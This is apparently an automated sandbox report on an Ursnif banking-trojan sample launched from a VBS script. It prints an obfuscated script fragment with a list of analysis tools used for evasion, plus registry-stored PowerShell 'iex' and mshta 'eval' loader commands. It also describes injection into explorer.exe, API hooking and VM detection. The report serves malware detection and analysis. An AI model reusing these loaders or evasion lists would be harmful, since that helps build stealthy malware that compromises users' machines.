2883954 Guinevere conceit aviatrix agribusiness, 3430970 knoll clock extract Effie snakeroot kale inconsiderable poison julep coverall poodle farm, prim sadist bristlecone squaw skimp bullet logician inopportune ferry term legend aborigine capitulate journalese demand Mudd label switchblade dreary move Russo clipboard Benny denote Calhoun technic fortyfold urge Pusan committee. 9589938 sextic flounder Friedrich652 Malawi Agnes respirator basketball mud Hokan, Cameroun sportsman638 Hansen Sal nickname interstitial moor invariable pregnant countersink subterfuge ' mozzarella183 quintessential nourish sardonic incoherent indy legend513 probe. narcissist Delmarva alma Josef tutor episode Coronado Poynting strata weatherstripping coquina Sims querulous Clarendon alba connotative. pansy advent vex Brittany thicket meteor picofarad contingent inaccuracy sustenance ashore bookishproc = ((95 + 2327.0) - (4 + (37 + 2381.0)))shivery = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplor
            Suspicious powershell command line found
            Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline'
            Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline'
            Source: C:\Windows\explorer.exe Code function: 35_2_06104DCD push 3B000001h; retf

            Persistence and Installation Behavior:

            Creates processes via WMI
            Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.dll
            Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\earmark.avchd
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.dll

            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif
            Source: Yara match File source: 00000003.00000003.342326677.00000000046E0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.270925261.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.271044990.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.283759695.000000000530B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.270893136.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.271117901.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.270863314.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.270967614.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.271019633.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.271092585.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.384731401.00000000059A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
            Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY
            Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 6356, type: MEMORY
            Deletes itself after installation
            Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\0k4vu1eoeihu.vbs
            Hooks registry keys query functions (used to hide registry keys)
            Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
            Modifies the export address table of user mode modules (user mode EAT hooks)
            Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
            Modifies the import address table of user mode modules (user mode IAT hooks)
            Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200
            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
            Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
            Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
            Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1687
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3825
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.dll
            Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\earmark.avchd
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.dll
            Source: C:\Windows\System32\wscript.exe TID: 6784 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3488 Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1380 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1324 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\explorer.exe Code function: 35_2_061037B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,
            Source: explorer.exe, 00000023.00000000.372098959.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000023.00000000.372098959.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
            Source: wscript.exe, 00000000.00000002.244679778.0000024A2A2D0000.00000002.00000001.sdmp, explorer.exe, 00000023.00000000.371555373.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 00000023.00000000.371822048.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: RuntimeBroker.exe, 00000025.00000000.381827183.000001FC1125D000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000023.00000000.366784203.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
            Source: explorer.exe, 00000023.00000000.372098959.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
            Source: explorer.exe, 00000023.00000000.372098959.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000023.00000000.372194462.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
            Source: explorer.exe, 00000023.00000002.486262373.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
            Source: wscript.exe, 00000000.00000003.208159693.0000024A2720B000.00000004.00000001.sdmp Binary or memory string: VRLsuWNfgPQMzpbewlBvPbwKsfYKojruwDArnkFEGbGbQvPfEMjJgmwhwPlGLyMKFDRXKpHGfStYcKkqBOJmklXzQzxXOzEWbOHq
            Source: wscript.exe, 00000000.00000002.244679778.0000024A2A2D0000.00000002.00000001.sdmp, explorer.exe, 00000023.00000000.371555373.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.244679778.0000024A2A2D0000.00000002.00000001.sdmp, explorer.exe, 00000023.00000000.371555373.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: explorer.exe, 00000023.00000002.485070309.0000000004E61000.00000004.00000001.sdmp Binary or memory string: Prod_VMware_SATAw
            Source: wscript.exe, 00000000.00000002.244679778.0000024A2A2D0000.00000002.00000001.sdmp, explorer.exe, 00000023.00000000.371555373.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exe File created: earmark.avchd.0.dr
            Allocates memory in foreign processes
            Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000 protect: page execute and read and write
            Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 177641C0000 protect: page execute and read and write
            Changes memory attributes in foreign processes to executable or writable
            Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Compiles code for process injection (via .Net compiler)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.0.cs
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 736E1580
            Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 736E1580
            Source: C:\Windows\explorer.exe Thread created: unknown EIP: 736E1580
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3388 base: 10C0000 value: 00
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3388 base: 7FFB736E1580 value: EB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3388 base: 14D0000 value: 80
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3388 base: 7FFB736E1580 value: 40
            Maps a DLL or memory area into another process
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
            Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3388
            Source: C:\Windows\explorer.exe Thread register set: target process: 3668
            Source: C:\Windows\explorer.exe Thread register set: target process: 4376
            Source: C:\Windows\explorer.exe Thread register set: target process: 4588
            Source: C:\Windows\explorer.exe Thread register set: target process: 5912
            Writes to foreign memory regions
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 10C0000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFB736E1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 14D0000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFB736E1580
            Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 6E40FFD000
            Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
            Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000
            Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
            Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 29233F0000
            Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
            Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 177641C0000
            Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3556.tmp' 'c:\Users\user\AppData\Local\Temp\1b1iaete\CSC8D8F05B01A304F97BCE9A6F7324A364.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES45E1.tmp' 'c:\Users\user\AppData\Local\Temp\gf33rpcq\CSC37B7B5B8D8A1469384B4E042B687670.TMP'
            Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
            Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: explorer.exe, 00000023.00000000.358164876.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
            Source: explorer.exe, 00000023.00000002.472973011.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.473076491.000001FC11790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.472576005.0000017764860000.00000002.00000001.sdmp Binary or memory string: Program Manager
            Source: explorer.exe, 00000023.00000000.368432531.0000000006860000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.473076491.000001FC11790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.472576005.0000017764860000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000023.00000002.472973011.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.473076491.000001FC11790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.472576005.0000017764860000.00000002.00000001.sdmp Binary or memory string: Progman
            Source: explorer.exe, 00000023.00000002.472973011.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.473076491.000001FC11790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.472576005.0000017764860000.00000002.00000001.sdmp Binary or memory string: Progmanlock
            Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmp Binary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmp Binary or memory string: regshot.exe

            Stealing of Sensitive Information:

            Yara detected Ursnif
            Source: Yara match File source: 00000003.00000003.342326677.00000000046E0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.270925261.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.271044990.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.283759695.000000000530B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.270893136.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.271117901.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000003.270863314.0000000005488000.00000004.00000040.sdmp, type: MEMORY
